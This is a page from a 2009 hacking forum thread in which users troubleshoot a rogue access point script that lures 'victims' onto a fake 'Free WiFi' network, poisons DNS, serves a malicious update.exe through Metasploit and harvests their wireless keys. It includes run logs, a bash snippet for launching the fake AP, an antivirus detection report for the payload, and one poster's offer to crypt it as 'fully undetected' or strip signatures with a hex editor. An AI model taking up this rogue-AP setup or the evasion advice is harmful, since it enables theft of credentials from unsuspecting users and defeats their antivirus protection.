Remote Exploit Forums

  #21 (permalink)  
Old 08-03-2009, 08:19 PM
Senior Member
 
Join Date: May 2007
Posts: 202

check out the man pages of airbase-ng, it should tell you on there
  #22 (permalink)  
Old 08-04-2009, 03:46 AM
Banned
 
Join Date: Jun 2009
Posts: 12

Subscribing to this thread. Pure genius in the making...
  #23 (permalink)  
Old 08-24-2009, 06:03 AM
Member
 
Join Date: Oct 2007
Posts: 49

am i missing something? i get a few errors
at0: ERROR while getting interface flags: No such device
SIOCSIFADDR: No such device
at0: ERROR while getting interface flags: No such device
SIOCSIFNETMASK: No such device
SIOCSIFMTU: No such device
SIOCADDRT: No such process
Stopping DHCP server: dhcpd3 failed!
  #24 (permalink)  
Old 08-24-2009, 07:14 AM
Eatme's Avatar
Senior Member
 
Join Date: Aug 2009
Location: Socks v5
Posts: 183

cool this is something i been waiting FOR !!!!!!!!!!!!!!!!!!!!!!!

BTW - if the victim has a good AVS installed this won't work cuz "update.exe" file is detected by 14 AVs.

File Info

Report generated: 24.8.2009 at 7.02.43 (GMT 1)
Filename: update.exe
File size: 9 KB
MD5 Hash: 52ab75a06b8f348c67e7f392fa074ed6
SHA1 Hash: CDB5AB27A3D0B22C9A4886ECB8C5383743FC3595
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 14 on 22

Detections

a-squared - Virus.Win32.Exploider!IK
Avira AntiVir - TR/Small.cbi.4
Avast - Win32:Exploider-G [Trj]
AVG - Downloader.Small.61.BO
BitDefender - -
ClamAV - -
Comodo - TrojWare.Win32.Small.cbi
Dr.Web - -
Ewido - -
F-PROT6 - W32/WMFexploit.A.gen!Eldorado
Ikarus T3 - Virus.Win32.Exploider
Kaspersky - Trojan.Win32.Small.cbi
McAfee - Downloader-BQQ trojan
NOD32 v3 - -
Norman - Trojan W32/Smalltroj.QLBR
Panda - -
QuickHeal - Trojan.Agent.ATV
Solo Antivirus - Trojan.Win32.Small.Cbi
Sophos - Mal/UnkPack-Fam
TrendMicro - -
VBA32 - Trojan.Win32.Small.cbi
VirusBuster - -

Scan report generated by
NoVirusThanks.org


But i can easily crypt the file and make it 100% fud = fully undetected.

Quote:
Originally Posted by fload View Post
am i missing something? i get a few errors
at0: ERROR while getting interface flags: No such device
SIOCSIFADDR: No such device
at0: ERROR while getting interface flags: No such device
SIOCSIFNETMASK: No such device
SIOCSIFMTU: No such device
SIOCADDRT: No such process
Stopping DHCP server: dhcpd3 failed!

i get same errors too..and more

Quote:
Warning: Cannot convert string "nil2" to type FontStruct
xterm: unable to open font "-Misc-Fixed-Medium-R-Normal--20-200-75-75-C-100-ISO10646-1", trying "fixed"....
FakeAp started
Loading Metasploit with hb.rc
Warning: Cannot convert string "nil2" to type FontStruct
xterm: unable to open font "-Misc-Fixed-Medium-R-Normal--20-200-75-75-C-100-ISO10646-1", trying "fixed"....
Metasploit should be loading, keep an eye on metasploit for victims
Setting up IPTABLES
at0: ERROR while getting interface flags: No such device
SIOCSIFADDR: No such device
at0: ERROR while getting interface flags: No such device
SIOCSIFNETMASK: No such device
SIOCSIFMTU: No such device
SIOCADDRT: No such process
./wkg.sh: line 66: /etc/init.d/dhcp3-server: No such file or directory
IPTABLES updated and dhcp server started
starting webserver
./wkg.sh: line 72: /etc/init.d/lighttpd: No such file or directory
2009-08-25 00:27:29: (server.c.746) can't find username www-data
Web server started
Starting dns redirector
DNS poison started, check DNS poison if victims are being redirected to our webserver
Warning: Cannot convert string "nil2" to type FontStruct
xterm: unable to open font "-Misc-Fixed-Medium-R-Normal--20-200-75-75-C-100-ISO10646-1", trying "fixed"....

Last edited by Eatme; 08-25-2009 at 06:49 AM.
  #25 (permalink)  
Old 08-25-2009, 12:35 AM
Junior Member
 
Join Date: Dec 2007
Posts: 10

hm2075,


This is very good.

Thank you
  #26 (permalink)  
Old 08-28-2009, 12:39 PM
Just burned his ISO
 
Join Date: Dec 2007
Posts: 3

Quote:
Originally Posted by Eatme View Post
But i can easily crypt the file and make it 100% fud = fully undetected.

Hi!

May I ask what tool you would use to encrypt the exe file? Are there any free options for this?

And wouldn't the encrypted file need to be decrypted to memory for execution, thus making the payload detectable to the AVS before it runs?

Thanks

@OP dhcpd3 was not starting on my BT4 PF. I had to modify the line that starts the server. Besides that, your script is really beautiful.
  #27 (permalink)  
Old 08-28-2009, 07:28 PM
Nick_the_Greek's Avatar
Senior Member
 
Join Date: Jul 2009
Location: Greece
Posts: 124

@fload and @Eatme

Quote:
Originally Posted by fload View Post
am i missing something? i get a few errors
at0: ERROR while getting interface flags: No such device
SIOCSIFADDR: No such device
at0: ERROR while getting interface flags: No such device
SIOCSIFNETMASK: No such device
SIOCSIFMTU: No such device
SIOCADDRT: No such process
Stopping DHCP server: dhcpd3 failed!

Check out guys wkg.sh script, line 6:
Code:
export   fakeap_interface=wlan0
Change wlan0 to the interface name of your card. (ath0, ra0 or whatever)
Also in line 36 where airbase-ng is starting softAP:
Code:
xterm -geometry 75x15+1+0 -T FakeAP -e airbase-ng -e "Free WiFi" mon0 -v&
Change mon0 to whatever your interface is called when your card gets into monitor mode. (hope you understand me. I know, my English are...)
@Eatme
Are you running BT4PF?
Quote:
Originally Posted by Eatme View Post
xterm: unable to open font "-Misc-Fixed-Medium-R-Normal--20-200-75-75-C-100-ISO10646-1", trying "fixed"....
./wkg.sh: line 66: /etc/init.d/dhcp3-server: No such file or directory
Quote:
Originally Posted by Eatme View Post
./wkg.sh: line 72: /etc/init.d/lighttpd: No such file or directory
wkg.sh line 12
Quote:
"Have you downloaded lighttpd? if not open a shell and type apt-get install lighttpd"
@hm2075 Great job. You can also use this:
Code:
echo -n "Enter your wireless interface name, for example wlan0: "
read -e WIFACE
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
echo -n "Enter your wireless interface MAC(XX:XX:XX:XX:XX:XX) [Optional,]: "
read -e MAC
echo -n "Enter the channel you would like your rogue AP to be called [Optional]: "
read -e CHAN
airmon-ng stop $WIFACE
ifconfig $WIFACE down
airmon-ng start $WIFACE
cmd="konsole -e airbase-ng -e ""$ESSID""  -v "
if [ -n "$CHAN" ]; then
cmd=$cmd"-c "$CHAN" "
fi
if [ -n "$MAC" ]; then
cmd=$cmd"-a "$MAC" "
fi
cmd=$cmd"$WIFACE"
$cmd &
Taken from Roguev3.sh - fifo_thekid. So, anyone can use your script with any card, at any channel, MAC, etc. You know better...
Keep it up hm2075
  #28 (permalink)  
Old 08-29-2009, 01:39 AM
Eatme's Avatar
Senior Member
 
Join Date: Aug 2009
Location: Socks v5
Posts: 183

Quote:
Originally Posted by Nick_the_Greek View Post
@fload and @Eatme
Check out guys wkg.sh script, line 6:
Code:
export   fakeap_interface=wlan0
Change wlan0 to the interface name of your card. (ath0, ra0 or whatever)
Also in line 36 where airbase-ng is starting softAP:
Code:
xterm -geometry 75x15+1+0 -T FakeAP -e airbase-ng -e "Free WiFi" mon0 -v&
Change mon0 to whatever your interface is called when your card gets into monitor mode. (hope you understand me. I know, my English are...)
@Eatme
Are you running BT4PF?


wkg.sh line 12

1. No, I'm using BT3
2. If the script already includes wlan0 as the interface, (which is what i use) then idk why it's not working..
3. I see where it uses mon0, i'll change that and see if it works..i'll report back asap. otherwise idk...

Ps- Thanks for the detailed help. I appreciate it..

Quote:
Originally Posted by arubinst View Post
Hi!

May I ask what tool you would use to encrypt the exe file? Are there any free options for this?

And wouldn't the encrypted file need to be decrypted to memory for execution, thus making the payload detectable to the AVS before it runs?

Thanks

@OP dhcpd3 was not starting on my BT4 PF. I had to modify the line that starts the server. Besides that, your script is really beautiful.

i use my private crypter that i coded. If you want your update.exe crypted just ask and i'll post new file in thread. Or you can easily Hex the updater.exe using any free Hex editor and take out the AV signatures...I can find a tut for you if you need one, if you can't find one..let me know I have no problem helping people that are in need.

Good luck trying to find a public FUD crypter, tho.

@Nick The Greek

Thanks, this helped, i'm getting progress even from before but i'm stuck here..I'm also seeing Broadcasts being made...idk if that's a good thing or not. Last time i didn't see them before.

Quote:
Metasploit should be loading, keep an eye on metasploit for victims
Setting up IPTABLES
./wkg.sh: line 66: /etc/init.d/dhcp3-server: No such file or directory
IPTABLES updated and dhcp server started
starting webserver
./wkg.sh: line 72: /etc/init.d/lighttpd: No such file or directory
2009-08-28 20:19:08: (server.c.746) can't find username www-data
Web server started
Starting dns redirector
DNS poison started, check DNS poison if victims are being redirected to our webserver
Warning: Cannot convert string "nil2" to type FontStruct
xterm: unable to open font "-Misc-Fixed-Medium-R-Normal--20-200-75-75-C-100-ISO10646-1" , trying "fixed"....
Check out /root/WK/keys folder, random text files should be generated which contains the victims wireless keys once they have been exploited
Opening WKV folder, keys will be uploaded in here

oh yea, i did install lighttpd too, even b4 this.

Edit: YES! I finally got a connection (which was my pc i'm currently on) I saw my "Free Wifi" Broadcasting. So I tried connecting to it, but there was a network problem. Idk if this has to do with the error(s) above, or it's cuz i'm on Windows 7 RTM.

BT3-VMware


NVM all the errors i posted...i went to BT4-PF (i don't even know why i was using bt3 in the 1st place i forgot) so i ran this script without bt3...and I ran into 0 errors...Thanks! For anybody that runs into the same errors i ran into or similar, just use BT4.

the only thing is that, when the victim(me) connects to Fake AP I get limited Access, but windows7 auto fixed it but it took 1 min for it to fix itself..

Also after downloading the update.exe, when executing the file on the targeted pc(mine) nothing happens
-no keys showed
-the file didn't even open (i even checked Taskmgr, while doing this and it never shows) but other than that everything else ran smooth

Last edited by Eatme; 09-02-2009 at 09:51 PM.
  #29 (permalink)  
Old 08-29-2009, 07:08 PM
floyd's Avatar
Senior Member
 
Join Date: Mar 2009
Location: I'm in a laundry room
Posts: 232

Everything works fine here... But I tried your update.exe in a Vista VM and it didn't work. How have you compiled this exe? Where is the source code?
__________________
Auswaertsspiel
  #30 (permalink)  
Old 08-29-2009, 11:18 PM
Eatme's Avatar
Senior Member
 
Join Date: Aug 2009
Location: Socks v5
Posts: 183

Quote:
Originally Posted by floyd View Post
Everything works fine here... But I tried your update.exe in a Vista VM and it didn't work. How have you compiled this exe? Where is the source code?

wow after editing my above post before yours.. update.exe isn't working for me either...i didn't really see what you said until after..

but yea it's not running on windows 7 nor vista.

corrupted ?

compile source would be useful..